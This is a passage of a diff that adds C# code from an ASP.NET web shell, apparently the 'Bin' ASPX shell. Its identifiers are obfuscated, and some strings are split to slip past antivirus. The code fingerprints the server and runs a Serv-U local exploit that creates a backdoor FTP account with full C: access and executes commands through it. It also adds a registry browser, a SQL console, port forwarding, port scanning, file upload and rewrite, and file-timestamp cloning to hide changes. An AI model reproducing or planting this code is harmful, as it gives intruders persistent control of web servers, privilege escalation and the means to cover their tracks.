+Bin_H2_Mac.InnerText="MAC Information >>";

+Bin_H2_Driver.InnerText="Driver Information >>";

+StringBuilder yEwc=new StringBuilder();

+StringBuilder hwJeS=new StringBuilder();

+StringBuilder jXkaE=new StringBuilder();

+yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");

+yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");

+yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");

+yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");

+yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");

+yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");

+yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");

+yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");

+DataTable BIOS=cCf("Win32_BIOS");

+yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");

+yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");

+yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");

+DataTable upM=cCf("Win32_PhysicalMemory");

+Int64 oZnZV=0;

+for(int i=0;i<upM.Rows.Count;i++)

+{

+oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());

+}

+yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");

+DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");

+for(int i=0;i<dOza.Rows.Count;i++)

+{

+hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");

+if(dOza.Rows[i]["MACAddress"]!=string.Empty)

+{

+hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");

+}

+}

+DataTable Driver=cCf("Win32_SystemDriver");

+for (int i=0; i<Driver.Rows.Count; i++)

+{

+jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");

+if (Driver.Rows[i]["PathName"]!=string.Empty)

+{

+jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);

+}

+else

+{

+jXkaE.Append("No path information");

+}

+jXkaE.Append("</li>");

+}

+Bin_Ul_Sys.InnerHtml=yEwc.ToString();

+Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();

+Bin_Ul_Driver.InnerHtml=jXkaE.ToString();

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+}

+public void ADCpk()

+{

+WICxe();

+APl.Visible=true;

+Bin_H2_Title.InnerText="Serv-U Exec >>";

+}

+public void lDODR()

+{

+string JGGg=string.Empty;

+string user=dNohJ.Value;

+string pass=NMd.Value;

+int port=Int32.Parse(HlQl.Value);

+string cmd=mHbjB.Value;

+string CRtK="user "+user+"\r\n";

+string jnNG="pass "+pass+"\r\n";

+string site="SITE MAINTENANCE\r\n";

+string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";

+string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";

+string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";

+string zexn="QUIT\r\n";

+UHlA.Visible=true;

+try

+{

+tcp.Connect("127.0.0.1",port);

+tcp.ReceiveBufferSize=1024;

+NS=tcp.GetStream();

+Rev(NS);

+ZJiM(NS,CRtK);

+Rev(NS);

+ZJiM(NS,jnNG);

+Rev(NS);

+ZJiM(NS,site);

+Rev(NS);

+ZJiM(NS,mtoJb);

+Rev(NS);

+ZJiM(NS,sutI);

+Rev(NS);

+ZJiM(NS,iVDT);

+Rev(NS);

+Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";

+zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);

+NS1=zvxm.GetStream();

+Rev(NS1);

+ZJiM(NS1,"user bin\r\n");

+Rev(NS1);

+ZJiM(NS1,"pass binftp\r\n");

+Rev(NS1);

+ZJiM(NS1,"site exec "+cmd+"\r\n");

+Rev(NS1);

+ZJiM(NS1,"quit\r\n");

+Rev(NS1);

+zvxm.Close();

+ZJiM(NS,mtoJb);

+Rev(NS);

+tcp.Close();

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+}

+protected void Rev(NetworkStream instream)

+{

+string FTBtf=string.Empty;

+if(instream.CanRead)

+{

+byte[] uPZ=new byte[1024];

+do

+{

+System.Threading.Thread.Sleep(50);

+int len=instream.Read(uPZ,0,uPZ.Length);

+FTBtf+=Encoding.Default.GetString(uPZ,0,len);

+}

+while(instream.DataAvailable);

+}

+Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";

+}

+protected void ZJiM(NetworkStream instream,string Sendstr)

+{

+if(instream.CanWrite)

+{

+byte[] uPZ=Encoding.Default.GetBytes(Sendstr);

+instream.Write(uPZ,0,uPZ.Length);

+}

+Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";

+}

+public void xFhz()

+{

+WICxe();

+kkHN.Visible=true;

+Bin_H2_Title.InnerText="RegShell >>";

+string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";

+vyX.Text="";

+foreach(string rootkey in txc.Split('|'))

+{

+vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";

+}

+lFAvw();

+}

+protected void lFAvw()

+{

+qPdI.Text="";

+string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";

+TableRow tr;

+TableCell tc;

+foreach(string rootkey in txc.Split('|'))

+{

+tr=new TableRow();

+tc=new TableCell();

+string bg=OKM();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+tc.Width=Unit.Parse("40%");

+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";

+tr.Cells.Add(tc);

+tc=new TableCell();

+tc.Width=Unit.Parse("60%");

+tc.Text="&lt;RootKey&gt;";

+tr.Cells.Add(tc);

+pLWD.Rows.Add(tr);

+}

+}

+protected void tpRQ(string Reg_Path)

+{

+if(!Reg_Path.EndsWith("\\"))

+{

+Reg_Path=Reg_Path+"\\";

+}

+qPdI.Text=Reg_Path;

+string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");

+cJG=Regex.Replace(cJG,@"\\+","\\");

+TableRow tr=new TableRow();

+TableCell tc=new TableCell();

+string bg=OKM();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";

+tc.Attributes["colspan"]="2" ;

+tr.Cells.Add(tc);

+pLWD.Rows.Add(tr);

+try

+{

+string subpath;

+string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);

+RegistryKey rk=null;

+RegistryKey sk;

+if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))

+{

+rk=Registry.LocalMachine;

+}

+else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))

+{

+rk=Registry.ClassesRoot;

+}

+else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))

+{

+rk=Registry.CurrentUser;

+}

+else if(Reg_Path.StartsWith("HKEY_USERS"))

+{

+rk=Registry.Users;

+}

+else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))

+{

+rk=Registry.CurrentConfig;

+}

+if(kDgkX.Length>1)

+{

+sk=rk.OpenSubKey(kDgkX);

+}

+else

+{

+sk=rk;

+}

+foreach(string innerSubKey in sk.GetSubKeyNames())

+{

+tr=new TableRow();

+tc=new TableCell();

+bg=OKM();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+tc.Width=Unit.Parse("40%");

+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";

+tr.Cells.Add(tc);

+tc=new TableCell();

+tc.Width=Unit.Parse("60%");

+tc.Text="&lt;SubKey&gt;";

+tr.Cells.Add(tc);

+pLWD.Rows.Add(tr);

+}

+TableRow cKVA=new TableRow();

+cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";

+cKVA.Attributes["bgcolor"]="#dddddd";

+TableCell JlmW=new TableCell();

+JlmW.Attributes["colspan"]="2" ;

+JlmW.Attributes["height"]="5";

+cKVA.Cells.Add(JlmW);

+pLWD.Rows.Add(cKVA);

+foreach(string strValueName in sk.GetValueNames())

+{

+tr=new TableRow();

+tc=new TableCell();

+bg=OKM();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+tc.Width=Unit.Parse("40%");

+tc.Text=strValueName;

+tr.Cells.Add(tc);

+tc=new TableCell();

+tc.Width=Unit.Parse("60%");

+tc.Text=DdmPl(sk,strValueName);

+tr.Cells.Add(tc);

+pLWD.Rows.Add(tr);

+}

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+}

+public string DdmPl(RegistryKey sk,string strValueName)

+{

+object uPZ;

+string RaTGr="";

+try

+{

+uPZ=sk.GetValue(strValueName,"NULL");

+if(uPZ.GetType()==typeof(byte[]))

+{

+foreach(byte tmpbyte in(byte[])uPZ)

+{

+if((int)tmpbyte<16)

+{

+RaTGr+="0";

+}

+RaTGr+=tmpbyte.ToString("X");

+}

+}

+else if(uPZ.GetType()==typeof(string[]))

+{

+foreach(string tmpstr in(string[])uPZ)

+{

+RaTGr+=tmpstr;

+}

+}

+else

+{

+RaTGr=uPZ.ToString();

+}

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+return RaTGr;

+}

+public void vNCHZ()

+{

+WICxe();

+YwLB.Visible=true;

+Bin_H2_Title.InnerText="PortScan >>";

+}

+public void rAhe()

+{

+WICxe();

+iDgmL.Visible=true;

+dQIIF.Visible=false;

+Bin_H2_Title.InnerText="DataBase >>";

+}

+protected void OUj()

+{

+if(Dtdr.State==ConnectionState.Closed)

+{

+try

+{

+Dtdr.ConnectionString=MasR.Text;

+Kkvb.Connection=Dtdr;

+Dtdr.Open();

+}

+catch(Exception Error)

+{

+xseuB(Error.Message);

+}

+}

+}

+protected void fUzE()

+{

+if(Dtdr.State==ConnectionState.Open)

+Dtdr.Close();

+Dtdr.Dispose();

+Kkvb.Dispose();

+}

+public DataTable CYUe(string sqlstr)

+{

+OleDbDataAdapter da=new OleDbDataAdapter();

+DataTable Dstog=new DataTable();

+try

+{

+OUj();

+Kkvb.CommandType=CommandType.Text;

+Kkvb.CommandText=sqlstr;

+da.SelectCommand=Kkvb;

+da.Fill(Dstog);

+}

+catch(Exception)

+{

+}

+finally

+{

+fUzE();

+}

+return Dstog;

+}

+public DataTable[] Bin_Data(string query)

+{

+ArrayList list=new ArrayList();

+try

+{

+string str;

+OUj();

+query=query+"\r\n";

+MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);

+int EmRX=0;

+for(int i=0;i<gcod.Count;i++)

+{

+Match FJD=gcod[i];

+str=query.Substring(EmRX,FJD.Index-EmRX);

+if(str.Trim().Length>0)

+{

+OleDbDataAdapter FgzeQ=new OleDbDataAdapter();

+Kkvb.CommandType=CommandType.Text;

+Kkvb.CommandText=str.Trim();

+FgzeQ.SelectCommand=Kkvb;

+DataSet cDPp=new DataSet();

+FgzeQ.Fill(cDPp);

+for(int j=0;j<cDPp.Tables.Count;j++)

+{

+list.Add(cDPp.Tables[j]);

+}

+}

+EmRX=FJD.Index+3;

+}

+str=query.Substring(EmRX,query.Length-EmRX);

+if(str.Trim().Length>0)

+{

+OleDbDataAdapter VwB=new OleDbDataAdapter();

+Kkvb.CommandType=CommandType.Text;

+Kkvb.CommandText=str.Trim();

+VwB.SelectCommand=Kkvb;

+DataSet arG=new DataSet();

+VwB.Fill(arG);

+for(int k=0;k<arG.Tables.Count;k++)

+{

+list.Add(arG.Tables[k]);

+}

+}

+}

+catch(SqlException e)

+{

+xseuB(e.Message);

+rom.Visible=false;

+}

+return(DataTable[])list.ToArray(typeof(DataTable));

+}

+public void JIAKU(string instr)

+{

+try

+{

+OUj();

+Kkvb.CommandType=CommandType.Text;

+Kkvb.CommandText=instr;

+Kkvb.ExecuteNonQuery();

+}

+catch(Exception e)

+{

+xseuB(e.Message);

+}

+}

+public void dwgT()

+{

+try

+{

+OUj();

+if(WYmo.SelectedItem.Text=="MSSQL")

+{

+if(Pvf.SelectedItem.Value!="")

+{

+Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());

+}

+}

+DataTable[] jxF=null;

+jxF=Bin_Data(jHIy.InnerText);

+if(jxF!=null && jxF.Length>0)

+{

+for(int j=0;j<jxF.Length;j++)

+{

+rom.PreRender+=new EventHandler(lRavM);

+rom.DataSource=jxF[j];

+rom.DataBind();

+for(int i=0;i<rom.Items.Count;i++)

+{

+string bg=OKM();

+rom.Items[i].CssClass=bg;

+rom.Items[i].Attributes["onmouseover"]="this.className='focus';";

+rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";

+}

+}

+}

+else

+{

+rom.DataSource=null;

+rom.DataBind();

+}

+rom.Visible=true;

+}

+catch(Exception e)

+{

+xseuB(e.Message);

+rom.Visible=false;

+}

+}

+public void xTZY()

+{

+try

+{

+if(WYmo.SelectedItem.Text=="MSSQL")

+{

+if(Pvf.SelectedItem.Value=="")

+{

+rom.DataSource=null;

+rom.DataBind();

+return;

+}

+}

+OUj();

+DataTable zKvOw=new DataTable();

+DataTable jxF=new DataTable();

+DataTable baVJV=new DataTable();

+if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")

+{

+Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);

+}

+zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });

+jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });

+foreach(DataRow dr in zKvOw.Rows)

+{

+jxF.ImportRow(dr);

+}

+jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");

+rom.PreRender+=new EventHandler(lRavM);

+rom.DataSource=jxF;

+rom.DataBind();

+for(int i=0;i<rom.Items.Count;i++)

+{

+string bg=OKM();

+rom.Items[i].CssClass=bg;

+rom.Items[i].Attributes["onmouseover"]="this.className='focus';";

+rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";

+}

+rom.Visible=true;

+}

+catch(Exception e)

+{

+xseuB(e.Message);

+rom.Visible=false;

+}

+}

+private void lRavM(object sender,EventArgs e)

+{

+DataGrid d=(DataGrid)sender;

+foreach(DataGridItem item in d.Items)

+{

+foreach(TableCell t in item.Cells)

+{

+t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");

+}

+}

+}

+public void vCf()

+{

+dQIIF.Visible=true;

+try

+{

+jHIy.InnerHtml=string.Empty;

+if(WYmo.SelectedItem.Text=="MSSQL")

+{

+rom.Visible=false;

+uXevN.Visible=true;

+irTU.Visible=true;

+OUj();

+DataTable ver=CYUe(@"SELECT @@VERSION");

+DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");

+DataTable cdb=CYUe(@"SELECT DB_NAME()");

+DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");

+DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");

+string jHlh=ver.Rows[0][0].ToString();

+string dbo=string.Empty;

+if(YKrm.Rows[0][0].ToString()=="1")

+{

+dbo="db_owner";

+}

+else

+{

+dbo="public";

+}

+if(rol.Rows[0][0].ToString()=="1")

+{

+dbo="<font color=blue>sa</font>";

+}

+string db_name=string.Empty;

+foreach(ListItem item in FGEy.Items)

+{

+ if(item.Selected=true)

+ {

+ item.Selected=false;

+ }

+}

+Pvf.Items.Clear();

+Pvf.Items.Add("-- Select a DataBase --");

+Pvf.Items[0].Value="";

+for(int i=0;i<dbs.Rows.Count;i++)

+{

+db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";

+Pvf.Items.Add(dbs.Rows[i][0].ToString());

+}

+irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";

+}

+else

+{

+uXevN.Visible=false;

+irTU.Visible=false;

+xTZY();

+}

+}

+catch(Exception e)

+{

+dQIIF.Visible=false;

+}

+}

+public void MHLv()

+{

+WICxe();

+hOWTm.Visible=true;

+string miansha1="P"+"o"+"r"+"t"+"M"+"a"+"p"+" "+">"+">";

+Bin_H2_Title.InnerText=miansha1;

+}

+public class PortForward

+{

+public string Localaddress;

+public int LocalPort;

+public string RemoteAddress;

+public int RemotePort;

+string type;

+Socket ltcpClient;

+Socket rtcpClient;

+Socket server;

+byte[] DPrPL=new byte[2048];

+byte[] wvZv=new byte[2048];

+public struct session

+{

+public Socket rdel;

+public Socket ldel;

+public int llen;

+public int rlen;

+}

+public static IPEndPoint mtJ(string host,int port)

+{

+IPEndPoint iep=null;

+IPHostEntry aGN=Dns.Resolve(host);

+IPAddress rmt=aGN.AddressList[0];

+iep=new IPEndPoint(rmt,port);

+return iep;

+}

+public void Start(string Rip,int Rport,string lip,int lport)

+{

+try

+{

+LocalPort=lport;

+RemoteAddress=Rip;

+RemotePort=Rport;

+Localaddress=lip;

+rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);

+ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);

+rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);

+}

+catch (Exception ex) { }

+}

+protected void iiGFO(IAsyncResult ar)

+{

+try

+{

+session RKXy=new session();

+RKXy.ldel=ltcpClient;

+RKXy.rdel=rtcpClient;

+ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);

+}

+catch (Exception ex) { }

+}

+protected void VTp(IAsyncResult ar)

+{

+try

+{

+session RKXy=(session)ar.AsyncState;

+ltcpClient.EndConnect(ar);

+RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);

+RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);

+}

+catch (Exception ex) { }

+}

+private void LFYM(IAsyncResult ar)

+{

+try

+{

+session RKXy=(session)ar.AsyncState;

+int Ret=RKXy.rdel.EndReceive(ar);

+if (Ret>0)

+ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);

+else lyTOK();

+}

+catch (Exception ex) { }

+}

+private void JTcp(IAsyncResult ar)

+{

+try

+{

+session RKXy=(session)ar.AsyncState;

+RKXy.ldel.EndSend(ar);

+RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);

+}

+catch (Exception ex) { }

+}

+private void xPS(IAsyncResult ar)

+{

+try

+{

+session RKXy=(session)ar.AsyncState;

+int Ret=RKXy.ldel.EndReceive(ar);

+if (Ret>0)

+RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);

+else lyTOK();

+}

+catch (Exception ex) { }

+}

+private void IZU(IAsyncResult ar)

+{

+try

+{

+session RKXy=(session)ar.AsyncState;

+RKXy.rdel.EndSend(ar);

+RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);

+}

+catch (Exception ex) { }

+}

+public void lyTOK()

+{

+try

+{

+if (ltcpClient!=null)

+{

+ltcpClient.Close();

+}

+if (rtcpClient!=null)

+rtcpClient.Close();

+}

+catch (Exception ex) { }

+}

+}

+protected void vuou()

+{

+PortForward gYP=new PortForward();

+gYP.lyTOK();

+}

+protected void ruQO()

+{

+PortForward gYP=new PortForward();

+gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));

+}

+public string mRDl(string instr)

+{

+string tmp=null;

+try

+{

+tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();

+}

+catch(Exception e)

+{

+}

+return tmp;

+}

+public void VikG()

+{

+string[] OTV=lOmX.Text.ToString().Split(',');

+for(int i=0;i<OTV.Length;i++)

+{

+IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));

+}

+try

+{

+Thread[] kbXY=new Thread[IVc.Count];

+int sdO=0;

+for(sdO=0;sdO<IVc.Count;sdO++)

+{

+kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));

+kbXY[sdO].Start();

+}

+for(sdO=0;sdO<kbXY.Length;sdO++)

+kbXY[sdO].Join();

+}

+catch

+{

+}

+}

+public class ScanPort

+{

+private string _ip="";

+private int jTdO=0;

+private TimeSpan _timeSpent;

+private string QGcH="Not scanned";

+public string ip

+{

+get { return _ip;}

+}

+public int port

+{

+get { return jTdO;}

+}

+public string status

+{

+get { return QGcH;}

+}

+public TimeSpan timeSpent

+{

+get { return _timeSpent;}

+}

+public ScanPort(string ip,int port)

+{

+_ip=ip;

+jTdO=port;

+}

+public void Scan()

+{

+TcpClient iYap=new TcpClient();

+DateTime qYZT=DateTime.Now;

+try

+{

+iYap.Connect(_ip,jTdO);

+iYap.Close();

+QGcH="<font color=green><b>Open</b></font>";

+}

+catch

+{

+QGcH="<font color=red><b>Close</b></font>";

+}

+_timeSpent=DateTime.Now.Subtract(qYZT);

+}

+}

+public static void YFcNP(System.Web.UI.Page page)

+{

+page.RegisterHiddenField("__EVENTTARGET","");

+page.RegisterHiddenField("__FILE","");

+string s=@"<script language=Javascript>";

+s+=@"function Bin_PostBack(eventTarget,eventArgument)";

+s+=@"{";

+s+=@"var theform=document.forms[0];";

+s+=@"theform.__EVENTTARGET.value=eventTarget;";

+s+=@"theform.__FILE.value=eventArgument;";

+s+=@"theform.submit();";

+s+=@"} ";

+s+=@"</scr"+"ipt>";

+page.RegisterStartupScript("",s);

+}

+protected void PPtK(object sender,EventArgs e)

+{

+WICxe();

+yhv.Visible=true;

+Bin_H2_Title.InnerText="File Search >>";

+NaLJ.Value=Request.PhysicalApplicationPath;

+oJiym.Visible=false;

+}

+protected void NBy(object sender,EventArgs e)

+{

+DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);

+if(!GQMM.Exists)

+{

+xseuB("Path invalid ! ");

+return;

+}

+oog(GQMM);

+xseuB("Search completed ! ");

+}

+public void oog(DirectoryInfo dir)

+{

+try

+{

+oJiym.Visible=true;

+foreach(FileInfo Bin_Files in dir.GetFiles())

+{

+try

+{

+if(Bin_Files.FullName==Request.PhysicalPath)

+{

+continue;

+}

+if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))

+{

+continue;

+}

+if(Ven.SelectedItem.Value=="name")

+{

+if(rAQ.Checked)

+{

+if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))

+{

+FJvQ(Bin_Files);

+}

+}

+else

+{

+if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)

+{

+Response.Write(Bin_Files.FullName);

+FJvQ(Bin_Files);

+}

+}

+}

+else

+{

+StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);

+string ava=sr.ReadToEnd();

+sr.Close();

+if(rAQ.Checked)

+{

+if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))

+{

+FJvQ(Bin_Files);

+if(YZw.Checked)

+{

+ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);

+StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);

+sw.Write(ava);

+sw.Close();

+}

+}

+}

+else

+{

+if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)

+{

+FJvQ(Bin_Files);

+if(YZw.Checked)

+{

+ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);

+StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);

+sw.Write(ava);

+sw.Close();

+}

+}

+}

+}

+}

+catch(Exception ex)

+{

+xseuB(ex.Message);

+continue;

+}

+}

+foreach(DirectoryInfo subdir in dir.GetDirectories())

+{

+oog(subdir);

+}

+}

+catch(Exception ex)

+{

+xseuB(ex.Message);

+}

+}

+public void FJvQ(FileInfo objfile)

+{

+TableRow tr=new TableRow();

+TableCell tc=new TableCell();

+string bg=OKM();

+tr.Attributes["onmouseover"]="this.className='focus';";

+tr.CssClass=bg;

+tr.Attributes["onmouseout"]="this.className='"+bg+"';";

+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";

+tr.Cells.Add(tc);

+tc=new TableCell();

+tc.Text=objfile.LastWriteTime.ToString();

+tr.Cells.Add(tc);

+tc=new TableCell();

+tc.Text=mTG(objfile.Length);

+tr.Cells.Add(tc);

+oJiym.Rows.Add(tr);

+}

+public void xseuB(string instr)

+{

+jDKt.Visible=true;

+jDKt.InnerText=instr;

+}

+protected void xVm(object sender,EventArgs e)

+{

+string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();

+if(Jfm==Password)

+{

+Response.Cookies.Add(new HttpCookie(vbhLn,Password));

+ljtzC.Visible=false;

+PBZw();

+}

+else

+{

+tZSx();

+}

+}

+protected void Ybg(object sender,EventArgs e)

+{

+krIR(Server.MapPath("."));

+}

+protected void KjPi(object sender,EventArgs e)

+{

+Bin_H2_Title.InnerText="IIS Spy >>";

+WICxe();

+VNR.Visible=true;

+AdCx();

+}

+protected void DGCoW(object sender,EventArgs e)

+{

+try

+{

+StreamWriter sw;

+if(NdCX.SelectedItem.Text=="UTF-8")

+{

+sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);

+}

+else

+{

+sw=new StreamWriter(Sqon.Value,false,Encoding.Default);

+}

+sw.Write(Xgvv.InnerText);

+sw.Close();

+xseuB("Save file success !");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(AXSbb.Value);

+}

+protected void lbjLD(object sender,EventArgs e)

+{

+string FlwA=AXSbb.Value;

+FlwA=OElM(FlwA);

+try

+{

+Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));

+xseuB("File upload success!");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(AXSbb.Value);

+}

+protected void EXV(object sender,EventArgs e)

+{

+krIR(AXSbb.Value);

+}

+protected void mcCY(object sender,EventArgs e)

+{

+krIR(Server.MapPath("."));

+}

+protected void iVk(object sender,CommandEventArgs e)

+{

+krIR(e.CommandArgument.ToString());

+}

+protected void XXrLw(object sender,EventArgs e)

+{

+try

+{

+File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));

+File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));

+File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));

+xseuB("File time clone success!");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(AXSbb.Value);

+}

+protected void tIykC(object sender,EventArgs e)

+{

+string path=pWVL.Value;

+try

+{

+File.SetAttributes(path,FileAttributes.Normal);

+if(ZhWSK.Checked)

+{

+File.SetAttributes(path,FileAttributes.ReadOnly);

+}

+if(SsR.Checked)

+{

